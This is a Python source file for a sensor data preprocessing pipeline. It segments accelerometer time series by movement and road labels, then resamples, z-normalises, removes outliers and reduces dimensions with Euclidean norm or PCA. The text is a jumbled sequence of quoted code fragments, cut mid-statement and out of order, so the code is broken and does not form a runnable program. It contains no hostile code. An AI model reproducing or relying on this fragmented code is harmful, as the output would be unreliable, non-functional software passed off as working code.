data_train_segments.append(road_segment)", "or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and isinstance(labels, pandas.DataFrame)):", "\"\"\" Segements a time series based on a label column, semantic segementation of", "pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment, freq=\"{}s\".format(segment_length), mode = 'mean') if segments_combined is None: segments_combined", "0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "except Exception: 
self.logger.error(traceback.format_exc()) os._exit(2) @overrides def encode_categorical_features(self, data, mode, columns, encoding_function): \"\"\" Encode", "[config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] selected_coarse_labels = config['pre_proc_movement_type_label'] #[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq", "self.reduce_quantitativ_data_dimensionality( data=data_test_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' )", "# https://nextjournal.com/schmudde/how-to-remove-outliers-in-data for column in columns: not_outliers = data[column].between( data[column].quantile(1.0 - quantile), data[column].quantile(quantile)", "pandas.concat((labels, data), axis=1) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "ind, column in enumerate(target_columns): data[column] = data[column] * (data[args[ind]] / data[args[3]]) return data", "mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data,", "next 3 lines after comment: # https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper", "reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif", "= None): \"\"\" Resamples quantitative data. 
:param data: :param freq: :param mode: :return:", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def project_accelerometer_to_global_coordinates(self, data, target_columns, mode, args=None): \"\"\"", "# Source: # https://stackoverflow.com/questions/19231871/convert-unix-time-to-readable-date-in-pandas-dataframe # https://stackoverflow.com/questions/42698421/pandas-to-datetime-from-milliseconds-produces-incorrect-datetime try: if data is None or column", "None or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data, pandas.DataFrame) or not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments: data_train_segments.append(road_segment) #Segment Test car_test_segments", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, replacement_mode,", "return data.resample(freq).sum() except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides", "os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change", "from pipeline.feature_engineering.preprocessing.abstract_preprocessor import Preprocessor from pipeline.feature_engineering.preprocessing.replacement_strategies.mean_replacement_strategy import MeanReplacementStrategy from 
pipeline.feature_engineering.preprocessing.replacement_strategies.del_row_replacement_strategy import DelRowReplacementStrategy from", "is not None and std is not None: if columns is not None:", "preprocessing steps necessary for training. :param data: pandas.DataFrame :param params: List :return: pandas.DataFrame,", "in car_test_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label', args=selected_road_labels ) for road_segment in road_segments:", "Fresh )[:-2] #Test data_test = self.de_segment_data(data_test_segments, selected_columns) data_test, mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2],", "data, unwanted_labels, replacement_mode): \"\"\" Remove rows that have an unwanted label. :param data:", "= data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO make configureable #data_test['acceleration_abs'] = data_test['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs']", "'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split')", "mode, columns, encoding_function): \"\"\" Encode categorical features using an encoding function. :param data:", "== 'mean' or mode is None: return data.resample(freq).mean() if mode == 'sum': return", "== 'del_row': return DelRowReplacementStrategy().replace(data, 'unwanted_labels', unwanted_labels) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "reduced = reduced.reset_index(drop=True) old_index = data.index data = data.reset_index(drop=True) data = pandas.concat([data, reduced],", "NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. 
Select all data with desired label", "not isinstance(freq, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'mean' or mode is None:", "Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\" Remove rows that", "\"\"\" Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame :param params:", ":return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None", "unix time stamps to date time. :param data: :param column: :param unit: :return:", "mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for", "data = self.remove_nans(data, replacement_mode='del_row') data.set_index(data['time'], drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) #", "if mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for", "= data_test_segments[ind].set_index('time') data_test_segments[ind] = self.resample_quantitative_data(data_test_segments[ind], freq=freq) #Valid for ind in range(len(data_valid_segments)): data_valid_segments[ind] =", "raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not None: data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0", "def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a time series based on", "in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and", "segments_combined = segment else: 
segments_combined = pandas.concat([segments_combined, segment], axis=0) if segments_combined is not", "reduced = pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index", "self.remove_outliers_from_quantitative_data( data_train, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via", "args=selected_coarse_labels) data_train_segments = [] for car_segment in car_train_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label',", "'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory behind below", "isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "if mode == 'semantic': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'labels': # 1. Select", "#[5] selected_road_labels = config['pre_proc_road_type_label'] #[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit,", "data.index data = pandas.concat([data, reduced], axis=1) data = data.rename(columns={0: reduced_column_name}) data = data.reset_index(drop=True)", "'mean': return MeanReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode", "Train car_train_segments = self.segment_data(data_train, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_train_segments = [] for car_segment in", "all preprocessing steps necessary for inference. 
:param data: pandas.DataFrame :param params: List :return:", "all(column in data.keys() for column in columns): raise TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if columns is not", "than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test for ind in range(len(data_test_segments)): data_test_segments[ind]", "car_test_segments = self.segment_data(data_test, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_test_segments = [] for car_segment in car_test_segments:", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode):", "NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row' :param replacement_value: any type,", "Ensure index is datetime index and standardize type data.index = pandas.DatetimeIndex(data.index.astype('datetime64[1s]')) #2. 
Segment", "type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_unwanted_labels(self, data, unwanted_labels, replacement_mode): \"\"\"", "Valid car_valid_segments = self.segment_data(data_valid, mode='labels', label_column='coarse_label', args=selected_coarse_labels) data_valid_segments = [] for car_segment in", "train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid =", ":return: \"\"\" try: if data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def resample_quantitative_data(self, data, freq,", "import DelRowReplacementStrategy from pipeline.feature_engineering.preprocessing.replacement_strategies.replacement_val_replacement_strategy import ReplacementValReplacementStrategy from overrides import overrides import traceback import", "data @overrides def training_split_process(self, data, config, labels): \"\"\" Apply all preprocessing steps necessary", "3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data", "if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements: segment.index", "segementation of a fixed interval. :param data: :param mode: :param label_column: :param args:", "data set. 
:param data: :param columns: :param mean: :param std: :return: \"\"\" try:", "for column in columns: data[column] = encoding_function(data[column]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError,", "pandas.DataFrame((numpy.dot(pca.components_, data[columns].T).T)) reduced = reduced.rename(columns={0:reduced_column_name}) reduced = reduced.reset_index(drop=True) old_index = data.index data =", "a data set. :param data: :param columns: :param mean: :param std: :return: \"\"\"", "is not None: data[columns] = (data[columns] - mean) / std else: data =", "freq: :param mode: :return: \"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if", "mean_test, std_test = self.znormalize_quantitative_data(data_test, selected_columns[:-2], mean_train, std_train) data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2],", "\"\"\" Encode categorical features using an encoding function. 
:param data: :param mode: :param", "print('Fetch params') acelerometer_columns = [config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train", "\"\"\" # Source: # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.resample.html # https://jakevdp.github.io/PythonDataScienceHandbook/03.11-working-with-time-series.html try: if data is None or", "not isinstance(data, pandas.DataFrame) or not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value)", "raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1: raise ValueError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if replacement_mode == 'quantile': #", "[config['data_set_column_names'][1:][0], config['data_set_column_names'][1:][1], config['data_set_column_names'][1:][2]] freq = config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train =", "for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data, mean,", "data.set_index(old_index) return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names", "if mode == 'gyroscope': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) if mode == 'gravity': if len(target_columns) !=", "#[1, 3] freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans')", "data set. 
:param data: :param columns: :return: \"\"\" try: if data is None:", "'NaN') if replacement_mode == 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return", "freq=freq) # 8000 1.25 Hz print('Dimensionality reduction') data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], #", "current run @0.95 for classical approach via TS Fresh )[:-2] data_train = data_train.loc[:,", "data is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame)", "data = data.set_index(old_index) return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1)", "quantile), data[column].quantile(quantile) ) data[column] = data[column][not_outliers] index_names = data[~not_outliers].index data.drop(index_names, inplace=True) old_index =", "= pandas.concat([segments_combined, segment], axis=0) if segments_combined is not None: segments_combined = segments_combined.reset_index() segments_combined.index", "'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index data = pandas.concat([data, reduced], axis=1)", "if data is None: data = data_segments[ind][selected_columns] else: data = pandas.concat([data, data_segments[ind][selected_columns]], axis=axis)", "or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode == 'custom_function': if encoding_function", "freq = config['pre_proc_resample_freq'] #'1000ms' print('Convert time unit, label data, remove nans') data =", "\"\"\" try: if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", "@0.95 for classical approach via TS Fresh )[:-1] return data @overrides def training_split_process(self,", "Source for next 3 lines after comment: # 
https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() !=", "= int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len),", "def znormalize_quantitative_data(self, data, columns = None, mean = None, std = None): \"\"\"", "data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len =", "os._exit(2) @overrides def re_represent_data(self, current_representation, target_representation, data): \"\"\" Change representation of a data", "not isinstance(data, pandas.DataFrame): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if not all(column in data.keys() for column in", "= self.resample_quantitative_data(data_train_segments[ind], freq=freq) # 8000 1.25 Hz #Test for ind in range(len(data_test_segments)): data_test_segments[ind]", "segments_combined.index.astype('datetime64[1s]')) segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc())", "= meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data,", "data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) #Test", "too short after splitting min_length_subsegements = [] for segment in segments: if segment.shape[0]", "= None, threshold = None): \"\"\" Removes outlieres either based on quantile or", "mode == 'orientation': if len(target_columns)+1 != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) # Source for theory", "representation of a data set. 
:param current_representation: :param target_representation: :param data: :return: \"\"\"", "for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment = self.resample_quantitative_data(segment,", "that are too long or too short after splitting min_length_subsegements = [] for", "labels, data): \"\"\" Combines labels vector and data matrix. :param labels: :param data:", "quantile or a threshold value. :param data: :param replacement_mode: :param columns: :param quantile:", "self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len = int(data_len *", "TypeError(self.messages.PROVIDED_ARRAY_DOESNT_MATCH_DATA.value) if mean is None and std is None: if columns is not", "= (data - data.min()) / (data.max() - data.min()) # to center around 0.0", ":param quantile: :param threshold: :return: \"\"\" try: if data is None or replacement_mode", "label value data_segments = [] for target_label in args: selected_data = data[data[label_column] ==", "drop=True, inplace=True) print('Resample') data = self.resample_quantitative_data(data, freq=freq) # 8000 1.25 Hz print('Dimensionality reduction')", "win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row')", "data = None for ind in range(len(data_segments)): if data is None: data =", "not isinstance(unwanted_labels, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if replacement_mode == 'del_row':", "mode == 'gravity': if len(target_columns) != len(args): raise TypeError(self.messages.PROVIDED_ARRAYS_DONT_MATCH_LENGTH.value) for ind, column in", "# Source for next 3 lines after comment: # 
https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff()", "self.resample_quantitative_data(data_valid_segments[ind], freq=freq) print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind],", "print('Dimensionality reduction') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] = self.reduce_quantitativ_data_dimensionality( data=data_train_segments[ind], mode=config['feature_eng_dim_reduction_type'], #", "(data[columns] - mean) / std else: data = (data - mean) / std", "used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try: if data", "= (data - mean) / std else: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) return data, mean, std", "is None or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if", ")[:-2] #Valid data_valid = self.de_segment_data(data_valid_segments, selected_columns) data_valid, mean_valid, std_valid = self.znormalize_quantitative_data(data_valid, selected_columns[:-2], mean_train,", ":param replacement_mode: :param columns: :param quantile: :param threshold: :return: \"\"\" try: if data", "segments_aggregated.append(segments_combined) return segments_aggregated except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html # https://en.wikipedia.org/wiki/Principal_component_analysis pca = 
PCA(n_components=1) pca.fit(data[columns]) reduced =", "if mode == 'custom_function': if encoding_function is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) for column in", "min_length_subsegements: segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) return min_length_subsegements #3. Resample and aggregate data segments_combined =", "int(data_len * valid_sz) data_train, data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid =", "for road_segment in road_segments: data_valid_segments.append(road_segment) print('Resample') #Train for ind in range(len(data_train_segments)): data_train_segments[ind] =", "any type, used as value if replacment_mode is 'default_val' :return: pandas.DataFrame \"\"\" try:", "args=None): \"\"\" Project accelerometer data from local vehicle coordinates to a global coordinate", "columns: :param encoding_function: :return: \"\"\" try: if data is None or mode is", "data = self.reduce_quantitativ_data_dimensionality( data=data, mode=config['feature_eng_dim_reduction_type'], # works better than euclidean for motif columns=acelerometer_columns,", "is None or labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not (isinstance(data, pandas.DataFrame) and", "\"\"\" Resamples quantitative data. :param data: :param freq: :param mode: :return: \"\"\" #", "data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical approach via TS", "== 'del_row': return DelRowReplacementStrategy().replace(data, 'NaN') if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value)", ": numpy.array_split(df, len(df) // chunk_size + 1, axis=0) # 1. 
Ensure index is", "(data.max() - data.min()) # to center around 0.0 substract 0.5 return data except", "or not isinstance(mode, str) or not isinstance( columns, list): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "'id'] # 'acceleration_abs' data_train = self.de_segment_data(data_train_segments, selected_columns) data_train, mean_train, std_train = self.znormalize_quantitative_data(data_train, selected_columns[:-2])", "if not isinstance(data, pandas.DataFrame) or not isinstance(mode, str) or not isinstance( columns, list):", "euclidean for motif columns=acelerometer_columns, reduced_column_name='acceleration_abs' ) print('Normalizing, outlier removal') selected_columns = ['acceleration_abs'] data,", "(TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def inference_split_process(self, data,", "if data is None or column is None or unit is None: raise", "except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\" Remove NaNs", "https://stackoverflow.com/questions/56257329/how-to-split-a-dataframe-based-on-consecutive-index non_sequence = pandas.Series(selected_data.index).diff() != 1 grouper = non_sequence.cumsum().values selected_data_segments = [group for", "not None: mean = data[columns].mean() std = data[columns].std() data[columns] = (data[columns] - data[columns].mean())", "= [] for segment in segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not", "try: if data is None or replacement_mode is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not", "elif mean is not None and std is not None: if columns is", "labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len = data.shape[0] test_len", 
"pandas.DataFrame) or not isinstance(mode, str) or not isinstance(reduced_column_name, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if mode", "# current run @0.95 for classical approach via TS Fresh )[:-2] #Valid data_valid", "min_periods=1, win_type='gaussian').sum(std=3) #data_valid['acceleration_abs'] = data_valid['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #data_train = self.remove_nans(data_train, replacement_mode='del_row') #data_test =", "args[1] exact_length = args[2] segments_aggregated = [] split = lambda df, chunk_size :", "\"\"\" Combines labels vector and data matrix. :param labels: :param data: :return: \"\"\"", "all data with desired label value data_segments = [] for target_label in args:", "def __init__(self): super().__init__() @overrides def segment_data(self, data, mode, label_column=None, args=None): \"\"\" Segements a", "https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html reduced = data[columns].apply(numpy.square, axis=1)[columns].sum(axis=1).apply(numpy.sqrt) #**(1/2) alternative old_index = data.index data", "to center around 0.0 substract 0.5 return data except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "replacement_mode == 'threshold': raise NotImplementedError(self.messages.NOT_IMPLEMENTED.value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1)", "or column is None or unit is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value) if not isinstance(data,", "\"\"\" Apply min-max-normalization to a data set. 
:param data: :param columns: :return: \"\"\"", "not isinstance(columns, list) or not isinstance(replacement_mode, str): raise TypeError(self.messages.ILLEGAL_ARGUMENT_TYPE.value) if len(columns) < 1:", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_nans(self, data, replacement_mode, replacement_value=None): \"\"\"", "data is None or replacement_mode is None or unwanted_labels is None: raise TypeError(self.messages.ILLEGAL_ARGUMENT_NONE_TYPE.value)", "None): \"\"\" Apply a dimensionality reduction technique to a data set. :param data:", "not None and std is not None: if columns is not None: data[columns]", "data from local vehicle coordinates to a global coordinate system. :param data: :param", "self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def convert_unix_to_datetime(self, data, column, unit): \"\"\"", "replacement_mode, replacement_value=None): \"\"\" Remove NaNs :param data: :param replacement_mode: string, 'mean', 'replacement_val', 'delet_row'", "* (data[args[ind]] / data[args[3]]) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc())", "data_test_valid = data.head(train_len), data.tail(test_len+valid_len) data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels')", "aggregate = args[1] exact_length = args[2] segments_aggregated = [] split = lambda df,", "= self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test, Validation split') data_len =", "test_sz) train_len = int(data_len * train_sz) valid_len = int(data_len * valid_sz) data_train, data_test_valid", "= data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment 
by labels') #Segment Train car_train_segments = self.segment_data(data_train,", "if replacement_mode == 'replacement_val': return ReplacementValReplacementStrategy().replace(data, 'NaN', replacement_vals=replacement_value) raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError,", "or not isinstance(mode, str) or not isinstance(target_columns, list): raise TypeError(type(data)) if mode ==", "unit = 'ms') data = self.label_data(data, labels) data = self.remove_nans(data, replacement_mode='del_row') print('Train, Test,", "data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except (TypeError, NotImplementedError, ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2)", "= data.set_index(old_index) return data if mode == 'pca': # Source: # https://stackoverflow.com/questions/23282130/principal-components-analysis-using-pandas-dataframe #", "encoding_function): \"\"\" Encode categorical features using an encoding function. 
:param data: :param mode:", "segments: if segment.shape[0] == segment_length: min_length_subsegements.append(segment) if not aggregate: for segment in min_length_subsegements:", "quantile: :param threshold: :return: \"\"\" try: if data is None or replacement_mode is", "data_valid = data_valid.loc[:, ~data_valid.columns.duplicated()] #print('Rolling mean smoothing') #data_train['acceleration_abs'] = data_train['acceleration_abs'].rolling(5, min_periods=1, win_type='gaussian').sum(std=3) #TODO", "None for segment in min_length_subsegements: segment = segment.reset_index() segment.index = pandas.DatetimeIndex(segment.index.astype('datetime64[1s]')) segment =", ":param args: :return: \"\"\" try: if data is None or mode is None:", "mode == 'euclidean': # Source: # https://thispointer.com/pandas-apply-apply-a-function-to-each-row-column-in-dataframe/ # https://www.google.com/search?client=ubuntu&channel=fs&q=euclidean+norm&ie=utf-8&oe=utf-8 # https://stackoverflow.com/questions/54260920/combine-merge-dataframes-with-different-indexes-and-different-column-names # https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.DataFrame.append.html", "meta_data['std_train'] print('Convert time unit, remove nans') data = self.convert_unix_to_datetime(data, column='time', unit='ms') data =", "#data_test = self.remove_nans(data_test, replacement_mode='del_row') #data_valid = self.remove_nans(data_valid, replacement_mode='del_row') #print(data_train.head(100)) return data_train, mean_train, std_train,", "try: if data is None or target_columns is None or mode is None:", "series. 
:param data_segments: :param selected_columns: :param axis: :return: \"\"\" try: data = None", "data = pandas.concat([data, reduced], axis=1) data = data.set_index(old_index) return data raise ValueError(self.messages.PROVIDED_MODE_DOESNT_EXIST.value) except", "return data if mode == 'manhatten': reduced = data[columns].sum(axis=1).apply(numpy.abs, axis=1) old_index = data.index", "args=selected_coarse_labels) data_valid_segments = [] for car_segment in car_valid_segments: road_segments = self.segment_data(car_segment, mode='labels', label_column='road_label',", "mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit, remove nans') data =", "= config['pre_proc_resample_freq'] # '1000ms' mean_train = meta_data['mean_train'] std_train = meta_data['std_train'] print('Convert time unit,", "config, meta_data): \"\"\" Apply all preprocessing steps necessary for inference. :param data: pandas.DataFrame", "if data is None or target_columns is None or mode is None: raise", "data[columns]=(data[columns]-data[columns].min())/(data[columns].max()-data[columns].min()) # to center around 0.0 substract 0.5 else: data = (data -", ":param mode: :param reduced_column_name: :param columns: :return: \"\"\" try: if data is None", "data_test = data_test_valid.head(test_len) data_valid = data_test_valid.tail(valid_len) print('Segment by labels') #Segment Train car_train_segments =", "= data.reset_index(drop=True) data = data.set_index(old_index) return data if mode == 'manhatten': reduced =", "data_test = self.remove_outliers_from_quantitative_data( data_test, replacement_mode='quantile', columns=selected_columns[:-2], quantile=0.99 # current run @0.95 for classical", ":param columns: :return: \"\"\" try: if data is None or mode is None", "ValueError): self.logger.error(traceback.format_exc()) os._exit(1) except Exception: self.logger.error(traceback.format_exc()) os._exit(2) @overrides def remove_outliers_from_quantitative_data(self, data, 
